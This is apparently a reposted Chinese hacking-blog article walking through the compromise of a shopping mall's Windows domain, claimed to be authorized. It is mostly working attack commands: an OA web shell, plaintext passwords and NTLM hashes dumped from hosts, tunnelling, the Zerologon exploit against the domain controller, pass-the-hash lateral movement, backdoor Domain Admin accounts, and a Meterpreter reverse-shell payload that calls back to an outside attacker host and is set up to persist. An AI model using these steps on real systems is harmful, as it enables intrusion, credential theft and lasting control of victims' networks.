记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

实战域渗透最终拿下域控

2023-03-18 13:55



现在只对常读和星标的公众号才展示大图推送,建议大家能把极梦C设为星标”,否则可能就看不到了啦



目标信息


经过授权,本次渗透的目标是一个商城购物中心。


官方网站:http://www.XXX.net/

攻击地址:http://X.X.X.X:16888/(通达OA)



攻击思路


攻击目标:拿下域控

攻击思路:拿下边界主机-->搭建通信隧道-->域内信息收集-->攻击域控-->远程验证-->权限维持



外围打点


利用通达OA漏洞利用工具一键Getshell

蚂剑连接

信息收集

whoami         --> nt authority\systemhostname       --> OASERVERtasklist /svc  --> 无安全防护软件ipconfig /all  --> 192.168.40.100  tigercity.netnetstat -an    --> RDP:3389systeminfo     --> Windows Server 2008 R2 Standardnet time /domain      --->   DC2K8.tigercity.net    --->   192.168.130.54net group "Domian Computers" /domain  ---> 500台主机net group "Domain Admins" /domain    -->  18个与管理员net user jf_admin /domain            -->  查询用户信息 SID:500


上线CS


CS生成马子直接上线

在CS上抓取明文密码并获取以下账号密码信息.....由此可不用创建后门账号

#beacon执行命令logonpasswords
#账号密码(本地)username:wangshenpassword:WS20120904
username:MoMIngpassword:1234AdmiN@
username:Administratorpassword:*.innstar.78.45




搭建隧道


由于只有一个IP处于内网因此需要使用Neo-Regorg搭建通信隧道来连接至边界主机的远程桌面...


#Neo-Regorg  generatepython3 neoreg.py -k 123admiN
#Neo-Regorg Server http://X.X.X.X:16888/nginx_reply.php    //通过蚁剑将tunnel.php文件上传上去并改名
#Neo-Regorg Connectpython3 neoreg.py -k 123admiN -u http://X.X.X.X:16888/nginx_reply.php

开启远程桌面并输入上以下地址与账号密码 进行连接登陆!至此拿下边界主机

#连接地址192.168.40.100
#连接用户密码username:Administratorpassword:*.innstar.78.45

当时远程连接情景为Administrator用户无法登陆上去...查询发现没有进入普通用户组加入即可...

net user administrator     //查看管理员账户信息net localgroup users administrator /add    //原本administrator用户没有加进普通用户组



提权/横向/维权


上传fscan程序...直接对域控进行信息收集...可尝试两种攻击方法!


* 尝试打永恒之蓝* 尝试Netlogon提权

根据经验先尝试使用CVE-2020-1472 漏洞进行攻击测试,在Kali中下载部署以下项目....

#项目地址https://github.com/SecureAuthCorp/impacket.git安装命令python3 setup.py install
#项目地址:https://github.com/dirkjanm/CVE-2020-1472使用方法:python3 cve-2020-1472-exploit.py 域控主机名 域控IPpython3 cve-2020-1472-exploit.py dc 192.168.4.2

在Kali上使用Neo-regeorg搭建起通信隧道.并配置proxychains进行测试连接...

#Neo-regeorg连接python3 neoreg.py -k 123admiN -u http://X.X.X.X:16888/nginx_reply.php
#proxychains配置vi /etc/proxychains4.confsocks5 127.0.0.1 1080
#通信隧道联通性测试proxychains rdesktop 192.168.130.54

根据之前获取的信息执行以下命令尝试打空域控密码....成功!

proxychains python3 cve-2020-1472-exploit.py DC2K8 192.168.130.54

进入在第一步下载的impacket/examples文件夹并打开命令行终端...使用以下语句来DUMP域控山的Hash值....在输入密码处直接回车(因为打空了密码)或者在命令后加上-no-pass参数

#攻击命令proxychains python3 secretsdump.py  tigercity.net/DC2K8\$@192.168.130.54  -just-dc#用户Hashtigercity.net\jf_admin:500:aad3b435b51404eeaad3b435b51404ee:4ed9fa78b52edf56286dc7fac36d5742:::krbtgt:502:aad3b435b51404eeaad3b435b51404ee:5656ea30d6942eacb722647e82c7c5fd:::

执行以下命令进行横向移动到域控命令提示符号下...

#使用案例proxychains psexec.py 域名/用户名@域控IP  -hashes :获取的administrator中hash值#攻击命令proxychains python3 psexec.py tigercity.net/jf_admin@192.168.130.54 -hashes aad3b435b51404eeaad3b435b51404ee:4ed9fa78b52edf56286dc7fac36d5742

横向到域控后在命令提示符下直接创建后门账号,进行远程登陆测试...进行CS权限维持

chcp 65001net user jf_admin /domainnet user 4pts 123admiN@ /add /domainnet group "Domain Admins" 4pts /add /domainnet group "Enterprise Admins" 4pts /add /domain
username:tigercity\4ptspassword:123admiN@




后续操作


在此从Kali中横向过去发现已经存在服务运行无法成功,此时就想借助MSF进行....再次成功且有点意思次故记录


在MSF上生成木马并通过蚁剑上传执行且上线,从而获取边界主机控制权限...

#生成木马文件msfvenom -p windows/meterpreter/reverse_tcp LHOST=X.X.118.221 LPORT=2958 -f exe -o Sysupdate.exe#MSFCONSOLEmsfconsole                                      //启动MSF的漏洞攻击框架use exploit/multi/handler                       //调用木马监听模块set payload windows/meterpreter/reverse_tcp     //设置木马服务端类型set lhost 10.0.20.3                             //设置监听的地址set lport 2958                                  //设置监听的端口run

进入PSEXEC模块进行配置并再次横向到域控上....

#Meterpreterrun autoroute -s 192.168.130.0/24portfwd add -l 29183 -r 192.168.130.54 -p 3389bg    #MSFuse exploit/windows/smb/psexecset RHOSTS 192.168.130.54set SMBUser jf_adminset SMBPass aad3b435b51404eeaad3b435b51404ee:4ed9fa78b52edf56286dc7fac36d5742set SMBDomain tigercity.netset LPORT 2968set LHOST X.X.118.221run

执行以下命令对域控主机与边界主机进行权限维持

#边界主机run persistence -U -i 10 -p 2958 -r x.x.118.221
#域控主机run persistence -U -i 10 -p 2968 -r x.x.118.221
#一步代劳run metsvc -A

受害者合照....








星球内容

正式运营星球:

1.src真实漏洞挖掘案例分享(永久不定时更新),过程详细一看就会哦。
2.自研/二开等工具/平台的分享。
3.漏洞分析/资料共享等。






























ps:漏洞都是加班加点挖到的,最近白嫖的人日益增多越来越多。
白嫖党过多,增加了新人阅读权限,3天就解除。












关于文章/Tools获取方式:请关注交流群或者知识星球。











关于交流群:因为某些原因,更改一下交流群的获取方式:

1.请点击联系我们->联系官方->客服小助手添加二维码拉群 。  







关于知识星球的获取方式:

1.后台回复发送 "知识星球",即可获取知识星球二维码。

2如若上述方式不行,请点击联系我们->联系官方->客服小助手添加二维码进入星球 。  

3.为了提高质量,推出"免费名人堂"名额,后台回复发送 "知识星球"了解详情。








免责声明


        


本公众号文章以技术分享学习为目的。

由于传播、利用本公众号发布文章而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号及作者不为此承担任何责任。

一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!






知识来源: mp.weixin.qq.com%2Fs%2FANKk7AxmUuOe89tEjuo-Rg&id=97909f667d565fb8ff2d7c846a9393dc

阅读:72928 | 评论:0 | 标签:渗透

想收藏或者和大家分享这篇好文章→复制链接地址

“实战域渗透最终拿下域控”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

黑帝公告 📢

十年经营持续更新精选优质黑客技术文章Hackdig,帮你成为掌握黑客技术的英雄

🙇🧎¥由自富财,长成起一↓

标签云 ☁